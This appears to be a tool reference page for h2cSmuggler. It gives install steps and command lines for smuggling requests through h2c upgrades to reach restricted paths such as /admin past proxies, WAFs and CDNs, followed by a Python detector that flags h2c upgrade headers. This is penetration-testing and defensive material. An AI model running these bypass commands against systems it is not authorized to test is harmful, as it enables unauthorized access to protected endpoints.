Description
h2cSmuggler exploits HTTP/2 cleartext (h2c) upgrade mechanisms to smuggle requests past reverse proxies and WAFs. When a front-end proxy supports h2c upgrades but the back-end processes HTTP/1.1, it can lead to request smuggling and access control bypass.
Installation
```bash
git clone https://github.com/BishopFox/h2csmuggler.git
cd h2csmuggler
pip3 install -r requirements.txt
```
Basic Usage
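```bash
# Test whether the proxy forwards an h2c upgrade (-t/--test is a flag and takes no argument)
python3 h2csmuggler.py -x https://target.com --test
# Smuggle a request: -x is the proxy, the positional URL is the request to send
python3 h2csmuggler.py -x https://target.com https://target.com/admin
```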
Advanced Usage
```bash
# Custom headers
python3 h2csmuggler.py -x https://target.com -H "Cookie: session=abc" https://target.com/admin
# Request each path listed in a file (-i/--wordlist)
python3 h2csmuggler.py -x https://target.com -i paths.txt https://target.com/
# Verbose output
python3 h2csmuggler.py -x https://target.com -v https://target.com/admin
```
Common Workflows
```bash
# Access restricted paths via h2c smuggling
# If /admin returns 403 normally, try via h2c upgrade:
python3 h2csmuggler.py -x https://target.com https://target.com/admin
# Scan multiple paths
echo -e "/admin\n/internal\n/api/debug\n/actuator" > paths.txt
python3 h2csmuggler.py -x https://target.com -i paths.txt https://target.com/
# Test behind CDN/WAF
# h2c smuggling often bypasses CDN-level access controls
python3 h2csmuggler.py -x https://cdn.target.com https://cdn.target.com/api/internal
```
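A detection-side view of the h2c upgrade from the Description, as an added example that is not part of h2cSmuggler or the original page: it flags HTTP/1.1 requests carrying the RFC 7540 section 3.2 upgrade headers. The function names, result labels and inputs (raw request head, TLS flag, upstream status code) are assumptions about what a proxy or capture pipeline would supply.

```python
"""Flag HTTP/1.1 requests that ask for an h2c upgrade (RFC 7540, section 3.2)."""
from typing import Optional

def parse_headers(raw: bytes) -> dict:
    """Map lower-cased header names to lists of values from a raw request head."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers

def tokens(headers: dict, name: str) -> set:
    """Comma-separated tokens of a header, lower-cased, across repeated fields."""
    return {t.strip().lower() for v in headers.get(name, [])
            for t in v.split(",") if t.strip()}

def classify(raw: bytes, tls: bool, upstream_status: Optional[int] = None) -> str:
    """Label one proxied request (hypothetical labels, chosen for this example)."""
    headers = parse_headers(raw)
    wants_h2c = "h2c" in tokens(headers, "upgrade") or "http2-settings" in headers
    if not wants_h2c:
        return "ok"  # includes ordinary WebSocket upgrades
    if upstream_status == 101:
        # Back end switched protocols: the connection now carries HTTP/2 frames.
        return "h2c-tunnel-established"
    if tls:
        # h2c is defined for cleartext TCP only; over TLS, HTTP/2 uses ALPN "h2".
        return "h2c-upgrade-over-tls"
    return "h2c-upgrade-attempt"

# Constructed sample requests (not captured traffic).
H2C_REQUEST = (b"GET /admin HTTP/1.1\r\nHost: app.example\r\n"
               b"Upgrade: h2c\r\nHTTP2-Settings: AAMAAABkAARAAAAAAAIAAAAA\r\n"
               b"Connection: Upgrade, HTTP2-Settings\r\n\r\n")
WEBSOCKET_REQUEST = (b"GET /chat HTTP/1.1\r\nHost: app.example\r\n"
                     b"Upgrade: WebSocket\r\nConnection: Upgrade\r\n\r\n")

if __name__ == "__main__":
    for label, raw, tls, status in [
        ("h2c via TLS edge, back end replied 101", H2C_REQUEST, True, 101),
        ("h2c via TLS edge, upgrade refused", H2C_REQUEST, True, 200),
        ("h2c on cleartext listener", H2C_REQUEST, False, None),
        ("websocket upgrade", WEBSOCKET_REQUEST, True, 101),
    ]:
        print(f"{label}: {classify(raw, tls, status)}")
```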